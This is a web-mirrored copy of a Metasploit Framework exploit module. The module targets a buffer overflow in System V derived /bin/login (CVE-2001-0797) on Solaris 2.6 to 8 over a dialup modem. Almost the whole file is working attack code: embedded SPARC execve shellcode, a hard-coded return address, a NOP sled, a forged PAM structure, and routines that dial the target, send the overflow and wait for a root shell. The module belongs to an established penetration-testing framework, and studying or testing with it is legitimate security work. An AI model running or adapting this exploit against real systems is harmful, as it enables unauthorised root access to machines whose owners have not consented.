Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/solaris/dialup/manyargs.rb
32415 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Dialup

10
  include Msf::Module::Deprecated

11


12
  moved_from 'exploit/dialup/multi/login/manyargs'

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',

19
        'Description' => %q{

20
          This exploit connects to a system's modem over dialup and exploits

21
          a buffer overflow vulnerability in it's System V derived /bin/login.

22
          The vulnerability is triggered by providing a large number of arguments.

23
        },

24
        'References' => [

25
          ['CVE', '2001-0797'],

26
          ['OSVDB', '690'],

27
          ['OSVDB', '691'],

28
          ['BID', '3681'],

29
          ['URL', 'https://web.archive.org/web/20120114122443/http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],

30
          ['URL', 'https://web.archive.org/web/20120114113100/http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],

31
          ['URL', 'https://github.com/0xdea/exploits/blob/master/solaris/raptor_rlogin.c'],

32
        ],

33
        'Author' => [

34
          'I)ruid'

35
        ],

36
        'Arch' => ARCH_TTY,

37
        'License' => MSF_LICENSE,

38
        'Payload' => {

39
          'Space' => 3000,

40
          'BadChars' => '',

41
          'DisableNops' => true

42
        },

43
        'Targets' => [

44
          [

45
            'Solaris 2.6 - 8 (SPARC)',

46
            {

47
              'Platform' => 'unix',

48
              'Ret' => 0x00027184,

49
              # Solaris/SPARC special shellcode (courtesy of inode)

50
              # execve() + exit()

51
              'Shellcode' =>

52
                  "\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" \

53
                  "\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" \

54
                  "\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" \

55
                  "\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08".b,

56
              'NOP' => "\x90\x1b\x80\x0e".b

57
            }

58
          ],

59
        ],

60
        'DefaultTarget' => 0,

61
        'DisclosureDate' => '2001-12-12',

62
        'Notes' => {

63
          'Stability' => [ CRASH_SERVICE_RESTARTS ],

64
          'SideEffects' => [ IOC_IN_LOGS ],

65
          'Reliability' => [ REPEATABLE_SESSION ]

66
        }

67
      )

68
    )

69
  end

70


71
  def buildbuf

72
    print_status("Targeting: #{target.name}")

73


74
    retaddr = target.ret

75
    shellcode = target['Shellcode']

76
    nop = target['NOP']

77


78
    # prepare the evil buffer

79
    i = 0

80
    buf = ''

81


82
    # login name

83
    buf[i, 4] = 'bin '

84
    i += 4

85


86
    # return address

87
    buf[i, 4] = [retaddr].pack('N')

88
    i += 4

89
    buf[i, 1] = ' '

90
    i += 1

91


92
    # trigger the overflow

93
    (0...60).each do |_c|

94
      buf[i, 2] = 'a '

95
      i += 2

96
    end

97


98
    # padding

99
    buf[i, 4] = ' BBB'

100
    i += 4

101


102
    # nop sled and shellcode

103
    (0...398).each do |_c|

104
      buf[i, nop.size] = nop

105
      i += nop.size

106
    end

107
    shellcode.each_byte do |b|

108
      c = b.chr

109
      case c

110
      when '\\'

111
        buf[i, 2] = '\\\\'

112
        i += 2

113
      when "\xff", "\n", ' ', "\t"

114
        buf[i, 1] = '\\'

115
        buf[i + 1, 1] = (((b & 0o300) >> 6) + '0').chr

116
        buf[i + 2, 1] = (((b & 0o070) >> 3) + '0').chr

117
        buf[i + 3, 1] = ((b & 0o007) + '0').chr

118
        i += 4

119
      else

120
        buf[i, 1] = c

121
        i += 1

122
      end

123
    end

124


125
    # TODO: need to overwrite/skip the last byte of shellcode?

126
    # i -= 1

127


128
    # padding

129
    buf[i, 4] = 'BBB '

130
    i += 4

131


132
    # pam_handle_t: minimal header

133
    buf[i, 16] = 'CCCCCCCCCCCCCCCC'

134
    i += 16

135
    buf[i, 4] = [retaddr].pack('N')

136
    i += 4

137
    buf[i, 4] = [0x01].pack('N')

138
    i += 4

139


140
    # pam_handle_t: NULL padding

141
    (0...52).each do |_c|

142
      buf[i, 4] = [0].pack('N')

143
      i += 4

144
    end

145


146
    # pam_handle_t: pameptr must be the 65th ptr

147
    buf[i, 9] = "\x00\x00\x00 AAAA\n"

148
    i += 9

149


150
    return buf

151
  end

152


153
  def exploit

154
    buf = buildbuf

155


156
    print_status('Dialing Target')

157
    if !connect_dialup

158
      print_error('Exiting.')

159
      return

160
    end

161


162
    print_status('Waiting for login prompt')

163


164
    res = dialup_expect(/ogin:\s/i, 10)

165
    # puts Rex::Text.to_hex_dump(res[:buffer])

166
    if !(res[:match])

167
      print_error('Login prompt not found... Exiting.')

168
      disconnect_dialup

169
      return

170
    end

171


172
    # send the evil buffer, 256 chars at a time

173
    print_status('Sending evil buffer...')

174
    # puts Rex::Text.to_hex_dump(buf)

175
    len = buf.length

176
    p = 0

177
    while (len > 0)

178
      i = len > 0x100 ? 0x100 : len

179
      # puts Rex::Text.to_hex_dump(buf[p,i])

180
      dialup_puts(buf[p, i])

181
      len -= i

182
      p += i

183
      #			if len > 0

184
      #				puts Rex::Text.to_hex_dump("\x04")

185
      #				dialup_puts("\x04") if len > 0

186
      #			end

187
      select(nil, nil, nil, 0.5)

188
    end

189


190
    # wait for password prompt

191
    print_status('Waiting for password prompt')

192
    res = dialup_expect(/assword:/i, 30)

193
    # puts Rex::Text.to_hex_dump(res[:buffer])

194
    if !(res[:match])

195
      print_error('Target is likely not vulnerable... Exiting.')

196
      disconnect_dialup

197
      return

198
    end

199


200
    print_status('Password prompt received, waiting for shell')

201
    dialup_puts("pass\n")

202


203
    res = dialup_expect(/#\s/i, 20)

204
    # puts Rex::Text.to_hex_dump(res[:buffer])

205
    if !(res[:match])

206
      print_error('Shell not found.')

207
      print_error('Target is likely not vulnerable... Exiting.')

208
      disconnect_dialup

209
      return

210
    end

211


212
    print_status('Success!!!')

213
    handler

214


215
    disconnect_dialup

216
  end

217
end

218


219